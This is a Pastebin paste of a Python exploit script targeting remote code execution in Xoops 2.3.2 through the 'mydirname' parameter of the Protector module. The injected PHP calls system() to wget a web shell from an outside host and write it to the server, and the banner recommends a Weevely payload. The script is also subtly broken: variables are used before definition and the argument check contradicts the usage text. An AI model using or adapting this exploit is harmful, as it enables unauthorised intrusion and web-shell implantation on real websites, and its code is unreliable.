Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # Title: Xoops 2.3.2 "mydirname" Remote Code Execution Exploit
- # CVE: ????-????
- # Reference: http://secunia.com/advisories/33435/
- # Author: infodox
- # Site: http://insecurety.net/
- # Twitter: @info_dox
- # Old news, just practicin' my python :3
- import requests
- import sys
- vulnurl = "/xoops_lib/modules/protector/onupdate.php?" # Oh look, the vuln URL!
- xpl = "mydirname=a(){}system(%27"+cmd+"%27);%20function%20v"
- cmd = "wget%20"+payloadurl+"%20-O%20shell.php"
- payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right?
- def banner():
- print """
- Xoops "mydirname" remote code execution exploit. Basically PHP Eval() bug :)
- Rather lame exploit I must admit, just practicing my Python.
- To use, just run it against the host and pray. I advise using a Weevely payload.
- ~infodox
- """
- if len(sys.argv) != 4:
- banner()
- print "Usage: ./x2.py <target>"
- print "Where <target> is the vulnerable website."
- print "Example: ./x2.py http://lamesite.com"
- sys.exit(1)
- banner()
- target = sys.argv[1]
- pwnme = target + vulnurl + xpl
- print "[+] Running Exploit..."
- requests.get(pwnme)
- print "[?] Gotshell?"
- print "[+] Shell should be at "+target+"/xoops_lib/modules/protector/shell.php"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
